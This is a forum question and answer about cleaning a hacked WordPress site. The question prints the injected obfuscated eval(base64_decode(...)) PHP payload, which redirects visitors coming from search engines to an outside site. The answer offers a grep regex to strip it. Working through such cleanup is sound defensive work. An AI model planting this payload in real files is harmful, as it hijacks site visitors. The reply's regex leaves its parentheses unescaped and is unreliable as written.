Using grep to remove malicious code from WordPress php files

So basically a WordPress site that wasn’t updated was compromised. I’ve downloaded the files, identified the infected, and I found a pattern.

At the top of the file there is code like the following

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eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93a3BiLjI1dS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

Or something close with different characters.

I’m using grepWin to remove the code from a few hundred PHP files. What regex code can I use that will remove code that begins with eval(base64_decode( followed by a long line of text and ended with "));. Not the text in between is different for some files.

[note – the code I used above was shorten, don’t want to trigger any virus protectors with suspicious code]

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2 comments

  1. A regex for matching that would be as follows:

    /eval(base64_decode("[^)]+));/

    With WinGrep, use this string, though. Windows grep doesn’t like the surrounding slashes.

    eval(base64_decode("[^)]+));

    Then just replace with an empty string. Grep doesn’t usually provide this replace functionality, but I noted you said you were using WinGrep, which does provide a global replace function.